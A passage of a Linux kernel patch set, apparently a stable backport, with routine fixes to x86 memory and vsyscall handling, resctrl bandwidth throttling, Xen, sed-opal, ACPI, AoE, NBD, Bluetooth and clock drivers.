+diff --git a/arch/x86/include/asm/vsyscall.h b/arch/x86/include/asm/vsyscall.h
+index ab60a71a8dcb9..472f0263dbc61 100644
+--- a/arch/x86/include/asm/vsyscall.h
++++ b/arch/x86/include/asm/vsyscall.h
+@@ -4,6 +4,7 @@
+ 
+ #include <linux/seqlock.h>
+ #include <uapi/asm/vsyscall.h>
++#include <asm/page_types.h>
+ 
+ #ifdef CONFIG_X86_VSYSCALL_EMULATION
+ extern void map_vsyscall(void);
+@@ -24,4 +25,13 @@ static inline bool emulate_vsyscall(unsigned long error_code,
+ }
+ #endif
+ 
++/*
++ * The (legacy) vsyscall page is the long page in the kernel portion
++ * of the address space that has user-accessible permissions.
++ */
++static inline bool is_vsyscall_vaddr(unsigned long vaddr)
++{
++	return unlikely((vaddr & PAGE_MASK) == VSYSCALL_ADDR);
++}
++
+ #endif /* _ASM_X86_VSYSCALL_H */
+diff --git a/arch/x86/kernel/acpi/cppc.c b/arch/x86/kernel/acpi/cppc.c
+index 8d8752b44f113..ff8f25faca3dd 100644
+--- a/arch/x86/kernel/acpi/cppc.c
++++ b/arch/x86/kernel/acpi/cppc.c
+@@ -20,7 +20,7 @@ bool cpc_supported_by_cpu(void)
+ 		    (boot_cpu_data.x86_model >= 0x20 && boot_cpu_data.x86_model <= 0x2f)))
+ 			return true;
+ 		else if (boot_cpu_data.x86 == 0x17 &&
+-			 boot_cpu_data.x86_model >= 0x70 && boot_cpu_data.x86_model <= 0x7f)
++			 boot_cpu_data.x86_model >= 0x30 && boot_cpu_data.x86_model <= 0x7f)
+ 			return true;
+ 		return boot_cpu_has(X86_FEATURE_CPPC);
+ 	}
+diff --git a/arch/x86/kernel/cpu/resctrl/internal.h b/arch/x86/kernel/cpu/resctrl/internal.h
+index 0b5c6c76f6f7b..4761d489a117a 100644
+--- a/arch/x86/kernel/cpu/resctrl/internal.h
++++ b/arch/x86/kernel/cpu/resctrl/internal.h
+@@ -281,14 +281,10 @@ struct rftype {
+  * struct mbm_state - status for each MBM counter in each domain
+  * @prev_bw_bytes: Previous bytes value read for bandwidth calculation
+  * @prev_bw:	The most recent bandwidth in MBps
+- * @delta_bw:	Difference between the current and previous bandwidth
+- * @delta_comp:	Indicates whether to compute the delta_bw
+  */
+ struct mbm_state {
+ 	u64	prev_bw_bytes;
+ 	u32	prev_bw;
+-	u32	delta_bw;
+-	bool	delta_comp;
+ };
+ 
+ /**
+diff --git a/arch/x86/kernel/cpu/resctrl/monitor.c b/arch/x86/kernel/cpu/resctrl/monitor.c
+index 77538abeb72af..b9adb707750c6 100644
+--- a/arch/x86/kernel/cpu/resctrl/monitor.c
++++ b/arch/x86/kernel/cpu/resctrl/monitor.c
+@@ -428,9 +428,6 @@ static void mbm_bw_count(u32 rmid, struct rmid_read *rr)
+ 
+ 	cur_bw = bytes / SZ_1M;
+ 
+-	if (m->delta_comp)
+-		m->delta_bw = abs(cur_bw - m->prev_bw);
+-	m->delta_comp = false;
+ 	m->prev_bw = cur_bw;
+ }
+ 
+@@ -508,11 +505,11 @@ static void update_mba_bw(struct rdtgroup *rgrp, struct rdt_domain *dom_mbm)
+ {
+ 	u32 closid, rmid, cur_msr_val, new_msr_val;
+ 	struct mbm_state *pmbm_data, *cmbm_data;
+-	u32 cur_bw, delta_bw, user_bw;
+ 	struct rdt_resource *r_mba;
+ 	struct rdt_domain *dom_mba;
+ 	struct list_head *head;
+ 	struct rdtgroup *entry;
++	u32 cur_bw, user_bw;
+ 
+ 	if (!is_mbm_local_enabled())
+ 		return;
+@@ -531,7 +528,6 @@ static void update_mba_bw(struct rdtgroup *rgrp, struct rdt_domain *dom_mbm)
+ 
+ 	cur_bw = pmbm_data->prev_bw;
+ 	user_bw = dom_mba->mbps_val[closid];
+-	delta_bw = pmbm_data->delta_bw;
+ 
+ 	/* MBA resource doesn't support CDP */
+ 	cur_msr_val = resctrl_arch_get_config(r_mba, dom_mba, closid, CDP_NONE);
+@@ -543,49 +539,31 @@ static void update_mba_bw(struct rdtgroup *rgrp, struct rdt_domain *dom_mbm)
+ 	list_for_each_entry(entry, head, mon.crdtgrp_list) {
+ 		cmbm_data = &dom_mbm->mbm_local[entry->mon.rmid];
+ 		cur_bw += cmbm_data->prev_bw;
+-		delta_bw += cmbm_data->delta_bw;
+ 	}
+ 
+ 	/*
+ 	 * Scale up/down the bandwidth linearly for the ctrl group.  The
+ 	 * bandwidth step is the bandwidth granularity specified by the
+ 	 * hardware.
+-	 *
+-	 * The delta_bw is used when increasing the bandwidth so that we
+-	 * dont alternately increase and decrease the control values
+-	 * continuously.
+-	 *
+-	 * For ex: consider cur_bw = 90MBps, user_bw = 100MBps and if
+-	 * bandwidth step is 20MBps(> user_bw - cur_bw), we would keep
+-	 * switching between 90 and 110 continuously if we only check
+-	 * cur_bw < user_bw.
++	 * Always increase throttling if current bandwidth is above the
++	 * target set by user.
++	 * But avoid thrashing up and down on every poll by checking
++	 * whether a decrease in throttling is likely to push the group
++	 * back over target. E.g. if currently throttling to 30% of bandwidth
++	 * on a system with 10% granularity steps, check whether moving to
++	 * 40% would go past the limit by multiplying current bandwidth by
++	 * "(30 + 10) / 30".
+ 	 */
+ 	if (cur_msr_val > r_mba->membw.min_bw && user_bw < cur_bw) {
+ 		new_msr_val = cur_msr_val - r_mba->membw.bw_gran;
+ 	} else if (cur_msr_val < MAX_MBA_BW &&
+-		   (user_bw > (cur_bw + delta_bw))) {
++		   (user_bw > (cur_bw * (cur_msr_val + r_mba->membw.min_bw) / cur_msr_val))) {
+ 		new_msr_val = cur_msr_val + r_mba->membw.bw_gran;
+ 	} else {
+ 		return;
+ 	}
+ 
+ 	resctrl_arch_update_one(r_mba, dom_mba, closid, CDP_NONE, new_msr_val);
+-
+-	/*
+-	 * Delta values are updated dynamically package wise for each
+-	 * rdtgrp every time the throttle MSR changes value.
+-	 *
+-	 * This is because (1)the increase in bandwidth is not perfectly
+-	 * linear and only "approximately" linear even when the hardware
+-	 * says it is linear.(2)Also since MBA is a core specific
+-	 * mechanism, the delta values vary based on number of cores used
+-	 * by the rdtgrp.
+-	 */
+-	pmbm_data->delta_comp = true;
+-	list_for_each_entry(entry, head, mon.crdtgrp_list) {
+-		cmbm_data = &dom_mbm->mbm_local[entry->mon.rmid];
+-		cmbm_data->delta_comp = true;
+-	}
+ }
+ 
+ static void mbm_update(struct rdt_resource *r, struct rdt_domain *d, int rmid)
+diff --git a/arch/x86/mm/fault.c b/arch/x86/mm/fault.c
+index 1dbbad73192a1..f20636510eb1e 100644
+--- a/arch/x86/mm/fault.c
++++ b/arch/x86/mm/fault.c
+@@ -818,15 +818,6 @@ show_signal_msg(struct pt_regs *regs, unsigned long error_code,
+ 	show_opcodes(regs, loglvl);
+ }
+ 
+-/*
+- * The (legacy) vsyscall page is the long page in the kernel portion
+- * of the address space that has user-accessible permissions.
+- */
+-static bool is_vsyscall_vaddr(unsigned long vaddr)
+-{
+-	return unlikely((vaddr & PAGE_MASK) == VSYSCALL_ADDR);
+-}
+-
+ static void
+ __bad_area_nosemaphore(struct pt_regs *regs, unsigned long error_code,
+ 		       unsigned long address, u32 pkey, int si_code)
+diff --git a/arch/x86/mm/maccess.c b/arch/x86/mm/maccess.c
+index 6993f026adec9..42115ac079cfe 100644
+--- a/arch/x86/mm/maccess.c
++++ b/arch/x86/mm/maccess.c
+@@ -3,6 +3,8 @@
+ #include <linux/uaccess.h>
+ #include <linux/kernel.h>
+ 
++#include <asm/vsyscall.h>
++
+ #ifdef CONFIG_X86_64
+ bool copy_from_kernel_nofault_allowed(const void *unsafe_src, size_t size)
+ {
+@@ -15,6 +17,14 @@ bool copy_from_kernel_nofault_allowed(const void *unsafe_src, size_t size)
+ 	if (vaddr < TASK_SIZE_MAX + PAGE_SIZE)
+ 		return false;
+ 
++	/*
++	 * Reading from the vsyscall page may cause an unhandled fault in
++	 * certain cases.  Though it is at an address above TASK_SIZE_MAX, it is
++	 * usually considered as a user space address.
++	 */
++	if (is_vsyscall_vaddr(vaddr))
++		return false;
++
+ 	/*
+ 	 * Allow everything during early boot before 'x86_virt_bits'
+ 	 * is initialized.  Needed for instruction decoding in early
+diff --git a/arch/x86/mm/mem_encrypt_identity.c b/arch/x86/mm/mem_encrypt_identity.c
+index d94ebd8acdfde..a11a6ebbf5ecf 100644
+--- a/arch/x86/mm/mem_encrypt_identity.c
++++ b/arch/x86/mm/mem_encrypt_identity.c
+@@ -507,7 +507,6 @@ void __init sme_enable(struct boot_params *bp)
+ 	const char *cmdline_ptr, *cmdline_arg, *cmdline_on, *cmdline_off;
+ 	unsigned int eax, ebx, ecx, edx;
+ 	unsigned long feature_mask;
+-	bool active_by_default;
+ 	unsigned long me_mask;
+ 	char buffer[16];
+ 	bool snp;
+@@ -593,22 +592,19 @@ void __init sme_enable(struct boot_params *bp)
+ 	     : "p" (sme_cmdline_off));
+ 
+ 	if (IS_ENABLED(CONFIG_AMD_MEM_ENCRYPT_ACTIVE_BY_DEFAULT))
+-		active_by_default = true;
+-	else
+-		active_by_default = false;
++		sme_me_mask = me_mask;
+ 
+ 	cmdline_ptr = (const char *)((u64)bp->hdr.cmd_line_ptr |
+ 				     ((u64)bp->ext_cmd_line_ptr << 32));
+ 
+ 	if (cmdline_find_option(cmdline_ptr, cmdline_arg, buffer, sizeof(buffer)) < 0)
+-		return;
++		goto out;
+ 
+ 	if (!strncmp(buffer, cmdline_on, sizeof(buffer)))
+ 		sme_me_mask = me_mask;
+ 	else if (!strncmp(buffer, cmdline_off, sizeof(buffer)))
+ 		sme_me_mask = 0;
+-	else
+-		sme_me_mask = active_by_default ? me_mask : 0;
++
+ out:
+ 	if (sme_me_mask) {
+ 		physical_mask &= ~sme_me_mask;
+diff --git a/arch/x86/tools/relocs.c b/arch/x86/tools/relocs.c
+index 2925074b9a588..9a5b101c45023 100644
+--- a/arch/x86/tools/relocs.c
++++ b/arch/x86/tools/relocs.c
+@@ -653,6 +653,14 @@ static void print_absolute_relocs(void)
+ 		if (!(sec_applies->shdr.sh_flags & SHF_ALLOC)) {
+ 			continue;
+ 		}
++		/*
++		 * Do not perform relocations in .notes section; any
++		 * values there are meant for pre-boot consumption (e.g.
++		 * startup_xen).
++		 */
++		if (sec_applies->shdr.sh_type == SHT_NOTE) {
++			continue;
++		}
+ 		sh_symtab  = sec_symtab->symtab;
+ 		sym_strtab = sec_symtab->link->strtab;
+ 		for (j = 0; j < sec->shdr.sh_size/sizeof(Elf_Rel); j++) {
+diff --git a/arch/x86/xen/smp.c b/arch/x86/xen/smp.c
+index 4b0d6fff88de5..1fb9a1644d944 100644
+--- a/arch/x86/xen/smp.c
++++ b/arch/x86/xen/smp.c
+@@ -65,6 +65,8 @@ int xen_smp_intr_init(unsigned int cpu)
+ 	char *resched_name, *callfunc_name, *debug_name;
+ 
+ 	resched_name = kasprintf(GFP_KERNEL, "resched%d", cpu);
++	if (!resched_name)
++		goto fail_mem;
+ 	per_cpu(xen_resched_irq, cpu).name = resched_name;
+ 	rc = bind_ipi_to_irqhandler(XEN_RESCHEDULE_VECTOR,
+ 				    cpu,
+@@ -77,6 +79,8 @@ int xen_smp_intr_init(unsigned int cpu)
+ 	per_cpu(xen_resched_irq, cpu).irq = rc;
+ 
+ 	callfunc_name = kasprintf(GFP_KERNEL, "callfunc%d", cpu);
++	if (!callfunc_name)
++		goto fail_mem;
+ 	per_cpu(xen_callfunc_irq, cpu).name = callfunc_name;
+ 	rc = bind_ipi_to_irqhandler(XEN_CALL_FUNCTION_VECTOR,
+ 				    cpu,
+@@ -90,6 +94,9 @@ int xen_smp_intr_init(unsigned int cpu)
+ 
+ 	if (!xen_fifo_events) {
+ 		debug_name = kasprintf(GFP_KERNEL, "debug%d", cpu);
++		if (!debug_name)
++			goto fail_mem;
++
+ 		per_cpu(xen_debug_irq, cpu).name = debug_name;
+ 		rc = bind_virq_to_irqhandler(VIRQ_DEBUG, cpu,
+ 					     xen_debug_interrupt,
+@@ -101,6 +108,9 @@ int xen_smp_intr_init(unsigned int cpu)
+ 	}
+ 
+ 	callfunc_name = kasprintf(GFP_KERNEL, "callfuncsingle%d", cpu);
++	if (!callfunc_name)
++		goto fail_mem;
++
+ 	per_cpu(xen_callfuncsingle_irq, cpu).name = callfunc_name;
+ 	rc = bind_ipi_to_irqhandler(XEN_CALL_FUNCTION_SINGLE_VECTOR,
+ 				    cpu,
+@@ -114,6 +124,8 @@ int xen_smp_intr_init(unsigned int cpu)
+ 
+ 	return 0;
+ 
++ fail_mem:
++	rc = -ENOMEM;
+  fail:
+ 	xen_smp_intr_free(cpu);
+ 	return rc;
+diff --git a/block/opal_proto.h b/block/opal_proto.h
+index 7152aa1f1a49e..7f306b08a0fe7 100644
+--- a/block/opal_proto.h
++++ b/block/opal_proto.h
+@@ -71,6 +71,7 @@ enum opal_response_token {
+ #define SHORT_ATOM_BYTE  0xBF
+ #define MEDIUM_ATOM_BYTE 0xDF
+ #define LONG_ATOM_BYTE   0xE3
++#define EMPTY_ATOM_BYTE  0xFF
+ 
+ #define OPAL_INVAL_PARAM 12
+ #define OPAL_MANUFACTURED_INACTIVE 0x08
+diff --git a/block/sed-opal.c b/block/sed-opal.c
+index 9bdb833e5817d..25e4ce452c1d3 100644
+--- a/block/sed-opal.c
++++ b/block/sed-opal.c
+@@ -935,16 +935,20 @@ static int response_parse(const u8 *buf, size_t length,
+ 			token_length = response_parse_medium(iter, pos);
+ 		else if (pos[0] <= LONG_ATOM_BYTE) /* long atom */
+ 			token_length = response_parse_long(iter, pos);
++		else if (pos[0] == EMPTY_ATOM_BYTE) /* empty atom */
++			token_length = 1;
+ 		else /* TOKEN */
+ 			token_length = response_parse_token(iter, pos);
+ 
+ 		if (token_length < 0)
+ 			return token_length;
+ 
++		if (pos[0] != EMPTY_ATOM_BYTE)
++			num_entries++;
++
+ 		pos += token_length;
+ 		total -= token_length;
+ 		iter++;
+-		num_entries++;
+ 	}
+ 
+ 	resp->num = num_entries;
+diff --git a/crypto/Kconfig b/crypto/Kconfig
+index d779667671b23..edf193aff23e7 100644
+--- a/crypto/Kconfig
++++ b/crypto/Kconfig
+@@ -1285,10 +1285,11 @@ config CRYPTO_JITTERENTROPY
+ 
+ 	  A non-physical non-deterministic ("true") RNG (e.g., an entropy source
+ 	  compliant with NIST SP800-90B) intended to provide a seed to a
+-	  deterministic RNG (e.g.  per NIST SP800-90C).
++	  deterministic RNG (e.g., per NIST SP800-90C).
+ 	  This RNG does not perform any cryptographic whitening of the generated
++	  random numbers.
+ 
+-	  See https://www.chronox.de/jent.html
++	  See https://www.chronox.de/jent/
+ 
+ config CRYPTO_KDF800108_CTR
+ 	tristate
+diff --git a/drivers/acpi/processor_idle.c b/drivers/acpi/processor_idle.c
+index fc5b5b2c9e819..6f613eef28879 100644
+--- a/drivers/acpi/processor_idle.c
++++ b/drivers/acpi/processor_idle.c
+@@ -1431,6 +1431,8 @@ int acpi_processor_power_exit(struct acpi_processor *pr)
+ 		acpi_processor_registered--;
+ 		if (acpi_processor_registered == 0)
+ 			cpuidle_unregister_driver(&acpi_idle_driver);
++
++		kfree(dev);
+ 	}
+ 
+ 	pr->flags.power_setup_done = 0;
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index 5ebeb0d7b6be0..1c5c1a269fbee 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -543,6 +543,39 @@ static const struct dmi_system_id lg_laptop[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "17U70P"),
+ 		},
+ 	},
++	{
++		/* Infinity E15-5A165-BM */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "GM5RG1E0009COM"),
++		},
++	},
++	{
++		/* Infinity E15-5A305-1M */
++		.matches = {
++			DMI_MATCH(DMI_BOARD_NAME, "GM5RGEE0016COM"),
++		},
++	},
++	{
++		/* Lunnen Ground 15 / AMD Ryzen 5 5500U */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Lunnen"),
++			DMI_MATCH(DMI_BOARD_NAME, "LLL5DAW"),
++		},
++	},
++	{
++		/* Lunnen Ground 16 / AMD Ryzen 7 5800U */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Lunnen"),
++			DMI_MATCH(DMI_BOARD_NAME, "LL6FA"),
++		},
++	},
++	{
++		/* MAIBENBEN X577 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "MAIBENBEN"),
++			DMI_MATCH(DMI_BOARD_NAME, "X577"),
++		},
++	},
+ 	{ }
+ };
+ 
+diff --git a/drivers/acpi/scan.c b/drivers/acpi/scan.c
+index 94154a849a3ea..293cdf486fd81 100644
+--- a/drivers/acpi/scan.c
++++ b/drivers/acpi/scan.c
+@@ -315,18 +315,14 @@ static int acpi_scan_device_check(struct acpi_device *adev)
+ 		 * again).
+ 		 */
+ 		if (adev->handler) {
+-			dev_warn(&adev->dev, "Already enumerated\n");
+-			return -EALREADY;
++			dev_dbg(&adev->dev, "Already enumerated\n");
++			return 0;
+ 		}
+ 		error = acpi_bus_scan(adev->handle);
+ 		if (error) {
+ 			dev_warn(&adev->dev, "Namespace scan failure\n");
+ 			return error;
+ 		}
+-		if (!adev->handler) {
+-			dev_warn(&adev->dev, "Enumeration failure\n");
+-			error = -ENODEV;
+-		}
+ 	} else {
+ 		error = acpi_scan_device_not_present(adev);
+ 	}
+diff --git a/drivers/block/aoe/aoecmd.c b/drivers/block/aoe/aoecmd.c
+index d7317425be510..cc9077b588d7e 100644
+--- a/drivers/block/aoe/aoecmd.c
++++ b/drivers/block/aoe/aoecmd.c
+@@ -419,13 +419,16 @@ aoecmd_cfg_pkts(ushort aoemajor, unsigned char aoeminor, struct sk_buff_head *qu
+ 	rcu_read_lock();
+ 	for_each_netdev_rcu(&init_net, ifp) {
+ 		dev_hold(ifp);
+-		if (!is_aoe_netif(ifp))
+-			goto cont;
++		if (!is_aoe_netif(ifp)) {
++			dev_put(ifp);
++			continue;
++		}
+ 
+ 		skb = new_skb(sizeof *h + sizeof *ch);
+ 		if (skb == NULL) {
+ 			printk(KERN_INFO "aoe: skb alloc failure\n");
+-			goto cont;
++			dev_put(ifp);
++			continue;
+ 		}
+ 		skb_put(skb, sizeof *h + sizeof *ch);
+ 		skb->dev = ifp;
+@@ -440,9 +443,6 @@ aoecmd_cfg_pkts(ushort aoemajor, unsigned char aoeminor, struct sk_buff_head *qu
+ 		h->major = cpu_to_be16(aoemajor);
+ 		h->minor = aoeminor;
+ 		h->cmd = AOECMD_CFG;
+-
+-cont:
+-		dev_put(ifp);
+ 	}
+ 	rcu_read_unlock();
+ }
+diff --git a/drivers/block/aoe/aoenet.c b/drivers/block/aoe/aoenet.c
+index 63773a90581dd..1e66c7a188a12 100644
+--- a/drivers/block/aoe/aoenet.c
++++ b/drivers/block/aoe/aoenet.c
+@@ -64,6 +64,7 @@ tx(int id) __must_hold(&txlock)
+ 			pr_warn("aoe: packet could not be sent on %s.  %s\n",
+ 				ifp ? ifp->name : "netif",
+ 				"consider increasing tx_queue_len");
++		dev_put(ifp);
+ 		spin_lock_irq(&txlock);
+ 	}
+ 	return 0;
+diff --git a/drivers/block/nbd.c b/drivers/block/nbd.c
+index 9a53165de4cef..5c4be8dda253c 100644
+--- a/drivers/block/nbd.c
++++ b/drivers/block/nbd.c
+@@ -2408,6 +2408,12 @@ static int nbd_genl_status(struct sk_buff *skb, struct genl_info *info)
+ 	}
+ 
+ 	dev_list = nla_nest_start_noflag(reply, NBD_ATTR_DEVICE_LIST);
++	if (!dev_list) {
++		nlmsg_free(reply);
++		ret = -EMSGSIZE;
++		goto out;
++	}
++
+ 	if (index == -1) {
+ 		ret = idr_for_each(&nbd_index_idr, &status_cb, reply);
+ 		if (ret) {
+diff --git a/drivers/bluetooth/hci_qca.c b/drivers/bluetooth/hci_qca.c
+index 8bfef7f81b417..2acda547f4f3e 100644
+--- a/drivers/bluetooth/hci_qca.c
++++ b/drivers/bluetooth/hci_qca.c
+@@ -2254,7 +2254,7 @@ static int qca_serdev_probe(struct serdev_device *serdev)
+ 
+ 		qcadev->bt_en = devm_gpiod_get_optional(&serdev->dev, "enable",
+ 					       GPIOD_OUT_LOW);
+-		if (IS_ERR_OR_NULL(qcadev->bt_en) &&
++		if (IS_ERR(qcadev->bt_en) &&
+ 		    (data->soc_type == QCA_WCN6750 ||
+ 		     data->soc_type == QCA_WCN6855)) {
+ 			dev_err(&serdev->dev, "failed to acquire BT_EN gpio\n");
+@@ -2263,7 +2263,7 @@ static int qca_serdev_probe(struct serdev_device *serdev)
+ 
+ 		qcadev->sw_ctrl = devm_gpiod_get_optional(&serdev->dev, "swctrl",
+ 					       GPIOD_IN);
+-		if (IS_ERR_OR_NULL(qcadev->sw_ctrl) &&
++		if (IS_ERR(qcadev->sw_ctrl) &&
+ 		    (data->soc_type == QCA_WCN6750 ||
+ 		     data->soc_type == QCA_WCN6855 ||
+ 		     data->soc_type == QCA_WCN7850))
+@@ -2285,7 +2285,7 @@ static int qca_serdev_probe(struct serdev_device *serdev)
+ 	default:
+ 		qcadev->bt_en = devm_gpiod_get_optional(&serdev->dev, "enable",
+ 					       GPIOD_OUT_LOW);
+-		if (IS_ERR_OR_NULL(qcadev->bt_en)) {
++		if (IS_ERR(qcadev->bt_en)) {
+ 			dev_warn(&serdev->dev, "failed to acquire enable gpio\n");
+ 			power_ctrl_enabled = false;
+ 		}
+diff --git a/drivers/bus/Kconfig b/drivers/bus/Kconfig
+index 7bfe998f3514a..bdc7633905504 100644
+--- a/drivers/bus/Kconfig
++++ b/drivers/bus/Kconfig
+@@ -186,11 +186,12 @@ config SUNXI_RSB
+ 
+ config TEGRA_ACONNECT
+ 	tristate "Tegra ACONNECT Bus Driver"
+-	depends on ARCH_TEGRA_210_SOC
++	depends on ARCH_TEGRA
+ 	depends on OF && PM
+ 	help
+ 	  Driver for the Tegra ACONNECT bus which is used to interface with
+-	  the devices inside the Audio Processing Engine (APE) for Tegra210.
++	  the devices inside the Audio Processing Engine (APE) for
++	  Tegra210 and later.
+ 
+ config TEGRA_GMI
+ 	tristate "Tegra Generic Memory Interface bus driver"
+diff --git a/drivers/clk/clk.c b/drivers/clk/clk.c
+index 33fedbd096f33..9004e07182259 100644
+--- a/drivers/clk/clk.c
++++ b/drivers/clk/clk.c
+@@ -407,6 +407,9 @@ static struct clk_core *clk_core_get(struct clk_core *core, u8 p_index)
+ 	if (IS_ERR(hw))
+ 		return ERR_CAST(hw);
+ 
++	if (!hw)
++		return NULL;
++
+ 	return hw->core;
+ }
+ 
+diff --git a/drivers/clk/hisilicon/clk-hi3519.c b/drivers/clk/hisilicon/clk-hi3519.c
+index ad0c7f350cf03..60d8a27a90824 100644
+--- a/drivers/clk/hisilicon/clk-hi3519.c
++++ b/drivers/clk/hisilicon/clk-hi3519.c
+@@ -130,7 +130,7 @@ static void hi3519_clk_unregister(struct platform_device *pdev)
+ 	of_clk_del_provider(pdev->dev.of_node);
+ 
+ 	hisi_clk_unregister_gate(hi3519_gate_clks,
+-				ARRAY_SIZE(hi3519_mux_clks),
++				ARRAY_SIZE(hi3519_gate_clks),
+ 				crg->clk_data);
+ 	hisi_clk_unregister_mux(hi3519_mux_clks,
+ 				ARRAY_SIZE(hi3519_mux_clks),
+diff --git a/drivers/clk/hisilicon/clk-hi3559a.c b/drivers/clk/hisilicon/clk-hi3559a.c
+index 9ea1a80acbe8b..0272276550ff1 100644
+--- a/drivers/clk/hisilicon/clk-hi3559a.c
++++ b/drivers/clk/hisilicon/clk-hi3559a.c
+@@ -491,7 +491,6 @@ static void hisi_clk_register_pll(struct hi3559av100_pll_clock *clks,
+ 
+ 		clk = clk_register(NULL, &p_clk->hw);
+ 		if (IS_ERR(clk)) {
+-			devm_kfree(dev, p_clk);
+ 			dev_err(dev, "%s: failed to register clock %s\n",
+ 			       __func__, clks[i].name);
+ 			continue;
+diff --git a/drivers/clk/meson/axg.c b/drivers/clk/meson/axg.c
+index 2ad3801398dc1..7802dabb26f6d 100644
+--- a/drivers/clk/meson/axg.c
++++ b/drivers/clk/meson/axg.c
+@@ -2144,7 +2144,9 @@ static struct clk_regmap *const axg_clk_regmaps[] = {
+ 	&axg_vclk_input,
+ 	&axg_vclk2_input,
+ 	&axg_vclk_div,
++	&axg_vclk_div1,
+ 	&axg_vclk2_div,
++	&axg_vclk2_div1,
+ 	&axg_vclk_div2_en,
+ 	&axg_vclk_div4_en,
+ 	&axg_vclk_div6_en,
+diff --git a/drivers/clk/qcom/dispcc-sdm845.c b/drivers/clk/qcom/dispcc-sdm845.c
+index 735adfefc3798..e792e0b130d33 100644
+--- a/drivers/clk/qcom/dispcc-sdm845.c
++++ b/drivers/clk/qcom/dispcc-sdm845.c
+@@ -759,6 +759,8 @@ static struct clk_branch disp_cc_mdss_vsync_clk = {
+ 
+ static struct gdsc mdss_gdsc = {
+ 	.gdscr = 0x3000,
++	.en_few_wait_val = 0x6,
++	.en_rest_wait_val = 0x5,
+ 	.pd = {
+ 		.name = "mdss_gdsc",
+ 	},
+diff --git a/drivers/clk/qcom/reset.c b/drivers/clk/qcom/reset.c
+index e45e32804d2c7..d96c96a9089f4 100644
+--- a/drivers/clk/qcom/reset.c
++++ b/drivers/clk/qcom/reset.c
+@@ -22,8 +22,8 @@ static int qcom_reset(struct reset_controller_dev *rcdev, unsigned long id)
+ 	return 0;
+ }
+ 
+-static int
+-qcom_reset_assert(struct reset_controller_dev *rcdev, unsigned long id)
++static int qcom_reset_set_assert(struct reset_controller_dev *rcdev,
++				 unsigned long id, bool assert)
+ {
+ 	struct qcom_reset_controller *rst;
+ 	const struct qcom_reset_map *map;
+@@ -33,21 +33,22 @@ qcom_reset_assert(struct reset_controller_dev *rcdev, unsigned long id)
+ 	map = &rst->reset_map[id];
+ 	mask = map->bitmask ? map->bitmask : BIT(map->bit);
+ 
+-	return regmap_update_bits(rst->regmap, map->reg, mask, mask);
++	regmap_update_bits(rst->regmap, map->reg, mask, assert ? mask : 0);
++
++	/* Read back the register to ensure write completion, ignore the value */
++	regmap_read(rst->regmap, map->reg, &mask);
++
++	return 0;
+ }
+ 
+-static int
+-qcom_reset_deassert(struct reset_controller_dev *rcdev, unsigned long id)
++static int qcom_reset_assert(struct reset_controller_dev *rcdev, unsigned long id)
+ {
+-	struct qcom_reset_controller *rst;
+-	const struct qcom_reset_map *map;
+-	u32 mask;
+-
+-	rst = to_qcom_reset_controller(rcdev);
+-	map = &rst->reset_map[id];
+-	mask = map->bitmask ? map->bitmask : BIT(map->bit);
++	return qcom_reset_set_assert(rcdev, id, true);
++}
+ 
+-	return regmap_update_bits(rst->regmap, map->reg, mask, 0);
++static int qcom_reset_deassert(struct reset_controller_dev *rcdev, unsigned long id)
++{
++	return qcom_reset_set_assert(rcdev, id, false);
+ }
+ 
+ const struct reset_control_ops qcom_reset_ops = {
+diff --git a/drivers/clk/renesas/r8a779f0-cpg-mssr.c b/drivers/clk/renesas/r8a779f0-cpg-mssr.c
+index 27b668def357f..7a49b91c93710 100644
+--- a/drivers/clk/renesas/r8a779f0-cpg-mssr.c
++++ b/drivers/clk/renesas/r8a779f0-cpg-mssr.c
+@@ -159,7 +159,7 @@ static const struct mssr_mod_clk r8a779f0_mod_clks[] __initconst = {
+ 	DEF_MOD("cmt1",		911,	R8A779F0_CLK_R),
+ 	DEF_MOD("cmt2",		912,	R8A779F0_CLK_R),
+ 	DEF_MOD("cmt3",		913,	R8A779F0_CLK_R),
+-	DEF_MOD("pfc0",		915,	R8A779F0_CLK_CL16M),
++	DEF_MOD("pfc0",		915,	R8A779F0_CLK_CPEX),
+ 	DEF_MOD("tsc",		919,	R8A779F0_CLK_CL16M),
+ 	DEF_MOD("ufs",		1514,	R8A779F0_CLK_S0D4_HSC),
+ };
+diff --git a/drivers/clk/renesas/r8a779g0-cpg-mssr.c b/drivers/clk/renesas/r8a779g0-cpg-mssr.c
+index d5b325e3c5398..e4c616921e5ea 100644
+--- a/drivers/clk/renesas/r8a779g0-cpg-mssr.c
++++ b/drivers/clk/renesas/r8a779g0-cpg-mssr.c
+@@ -22,7 +22,7 @@
+ 
+ enum clk_ids {
+ 	/* Core Clock Outputs exported to DT */
+-	LAST_DT_CORE_CLK = R8A779G0_CLK_R,
++	LAST_DT_CORE_CLK = R8A779G0_CLK_CP,
+ 
+ 	/* External Input Clocks */
+ 	CLK_EXTAL,
+@@ -139,6 +139,7 @@ static const struct cpg_core_clk r8a779g0_core_clks[] __initconst = {
+ 	DEF_FIXED("svd2_vip",	R8A779G0_CLK_SVD2_VIP,	CLK_SV_VIP,	2, 1),
+ 	DEF_FIXED("cbfusa",	R8A779G0_CLK_CBFUSA,	CLK_EXTAL,	2, 1),
+ 	DEF_FIXED("cpex",	R8A779G0_CLK_CPEX,	CLK_EXTAL,	2, 1),
++	DEF_FIXED("cp",		R8A779G0_CLK_CP,	CLK_EXTAL,	2, 1),
+ 	DEF_FIXED("viobus",	R8A779G0_CLK_VIOBUS,	CLK_VIO,	1, 1),
+ 	DEF_FIXED("viobusd2",	R8A779G0_CLK_VIOBUSD2,	CLK_VIO,	2, 1),
+ 	DEF_FIXED("vcbus",	R8A779G0_CLK_VCBUS,	CLK_VC,		1, 1),
+@@ -169,10 +170,17 @@ static const struct mssr_mod_clk r8a779g0_mod_clks[] __initconst = {
+ 	DEF_MOD("i2c4",		522,	R8A779G0_CLK_S0D6_PER),
+ 	DEF_MOD("i2c5",		523,	R8A779G0_CLK_S0D6_PER),
+ 	DEF_MOD("wdt1:wdt0",	907,	R8A779G0_CLK_R),
+-	DEF_MOD("pfc0",		915,	R8A779G0_CLK_CL16M),
+-	DEF_MOD("pfc1",		916,	R8A779G0_CLK_CL16M),
